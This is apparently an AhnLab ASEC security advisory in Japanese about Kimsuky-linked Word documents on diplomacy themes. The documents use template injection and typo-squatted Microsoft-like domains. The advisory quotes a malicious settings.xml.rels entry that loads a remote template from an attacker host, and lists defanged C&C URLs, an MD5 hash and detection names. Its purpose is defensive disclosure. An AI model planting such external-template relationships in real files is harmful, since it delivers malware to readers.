MS Office の正常な URL に偽装して拡散している Word ドキュメント

最近になって Word ドキュメントに偽装したマルウェアが特定の経路(ex.Kakao Talk グループチャット)を中心に拡散しているといった事例が共有された。

ASEC 分析チームは追加モニタリング過程において類似した Word ドキュメントで使用された URL が、正常な URL と類似性の側面でとても巧妙になっている状況を確認したため、ユーザーへの注意喚起を行う。

内部で現在までに確認された不正な Word ドキュメントのファイル名は以下の通りである。
ファイル名にある韓国人の実名は削除処理(○○○)を行ったが、外交安保分野の専門家である点、またファイル名も対北朝鮮/対中国/アンケート用紙/外交安保と関連しているといった特徴があった。

  • 北方限界線(NLL)問題に関する国際法的な検討と.docx
  • 習近平3期目発足の含意と展望.docx
  • 国家保衛省機構.docx
  • 北、前例のない強硬挑発アンケート用紙.docx
  • ○○○、RIES_ISSUE INSIGHT_Vol.33、習近平第3期発足- 中国はどこへ向かっているのか.docx
  • (討論2_参考-1)チップ(Chip)_4同盟国と韓国の選択(○○○寄稿文).docx
  • (討論2__参考-2)チップ4同盟と対外戦略(○○○寄稿文).docx
  • (worldKorean) 習近平第3期発足の含意と今後の展望.docx
  • ファッションと人権アンケート用紙.docx

上記のファイルはすべて OOXML(Office Open XML)フォーマットの Word ドキュメントであり、Template Injection 機能を攻撃に活用しているが、以下の XML コードは特定の Word ファイル内部に存在する settings.xml.rels ファイルを示したものである。

<?xml version="1.0" encoding="UTF-8" standalone="yes"
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="hxxp://schemas.openxmlformat[.]org/officeDocument/2006/relationships/o/word
officeid=NPW5D●●●DBS3V" TargetMode="External"/></Relationships>

注目すべき点は、External URL に使用されたアドレスが、正常な URL と非常に類似しているということである。以下の URL のルートドメインの階層を見ると openxmlformats.org と openxmlformat[.]org で 「s」 のスペル1つの差以外の部分で精巧に操作したものだと分かる。

  • 正常な URL : http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate
  • 不正な URL : hxxp://schemas.openxmlformat[.]org/officeDocument/2006/relationships/o/word?officeid=NPW5D●●●DBS3V

それ以外にも以下のようなフォーマットの URL を攻撃に使用する状況が確認されたが、ms-office[.]services / ms-offices[.]com / offices.word-template[.]net のような、正常なドメインと判断してしまうような巧妙に操作されたものであることが分かる。

  • hxxps://ms-office[.]services/templates-for-word/download?id=79B9●●●I9RWT
  • hxxps://ms-office[.]services/templates-for-word/download?id=V2BX●●●WE1A
  • hxxps://ms-office[.]services/templates-for-word/download?id=I5I2●●●MGW
  • hxxps://ms-office[.]services/templates-for-word/download?id=EFHO●●●5UCV
  • hxxps://ms-offices[.]com/templates-for-word/download?id=ZQ9H●●●YP8G
  • hxxps://ms-offices[.]com/templates-for-word/download?id=AL03●●●KZ2
  • hxxps://ms-offices[.]com/templates-for-word/download?id=DTF●●●SE6
  • hxxp://offices.word-template[.]net/office/template?view=GYIJ●●●0D4E

収集された一部の Word ドキュメントのプロパティを通して、以下のような短い間隔で何度にもわたって無差別に生成および配布する状況を確認することができる。

ユーザーは V3 を最新バージョンにアップデートして使用し、出どころが不明なドキュメントファイルは開かないようにしなければならない。

また、最近は無差別にマルウェアが配布されているという動向を考慮し、信頼できるユーザーからファイルを受け取ったとしても、そのファイルの発信元を正確に確認してから閲覧することを推奨する。

[ファイル検知]
– Downloader/DOC.External (2022.11.01.01)
– Downloader/DOC.Kimsuky (2022.11.05.00, 2022.11.06.00, 2022.11.10.01 他多数)
– Downloader/XML.Generic (2022.11.11.03)

[IOC]
MD5
– d698fccf14f670595442155395f42642

C&C
– hxxps://ms-office[.]services
– hxxps://ms-offices[.]com
– hxxp://offices.word-template[.]net
– hxxp://schemas.openxmlformat[.]org

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

5 1 vote
評価する
guest

0 コメント
Inline Feedbacks
View all comments